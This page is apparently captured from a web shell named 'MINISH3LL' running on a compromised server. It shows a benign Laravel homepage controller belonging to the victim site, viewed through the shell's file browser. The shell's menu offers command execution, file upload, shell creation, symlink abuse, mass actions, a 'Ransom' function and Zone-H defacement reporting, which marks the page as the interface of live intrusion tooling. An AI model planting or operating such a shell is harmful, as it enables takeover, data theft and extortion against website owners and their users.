KUJUNTI.ID MINISH3LL
Path : /var/www/clients/client0/web25/web/app/Http/Controllers/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/clients/client0/web25/web/app/Http/Controllers/IndexController.php


<?php

namespace App\Http\Controllers;

use App\Repositories\SlideRepository;
use App\Services\ImageService;
use App\Services\NewsService;
use App\Services\PostService;
use App\Services\RubricService;
use App\Services\StaffService;
use App\Services\TestimonialService;

class IndexController extends Controller
{
    protected $staffService;
    protected $imageService;
    protected $testimonialService;
    protected $newsService;
    protected $postService;
    protected $rubricService;
    protected $slideRepository;
    protected $trans;
    public function __construct(StaffService $staffService, ImageService $imageService, TestimonialService $testimonialService, NewsService $newsService, PostService $postService, RubricService $rubricService)
    {
        $this->staffService = $staffService;
        $this->imageService = $imageService;
        $this->testimonialService = $testimonialService;
        $this->newsService = $newsService;
        $this->postService = $postService;
        $this->rubricService = $rubricService;
        $this->slideRepository = new SlideRepository();
    }
    public function index()
    {
        $certifiedTeachers = $this->staffService->getCertifiedTeachers();
        $rubrics = $this->rubricService->getRubrics();
        // $images = $this->imageService->getImages(3);
        $testimonials = $this->testimonialService->getTestimonials();
        $news = $this->newsService->getNews(3);
        $posts = $this->postService->getPosts(3, config('app.nbrPages.posts'));
        $slides = $this->slideRepository->findAll();
        return view('front.index', compact(['certifiedTeachers', 'rubrics', 'news', 'posts', 'testimonials', 'slides']));
    }
}

© KUJUNTI.ID

Website Feedback Form

Please fill out the form below to send us your feedback.




Contact Support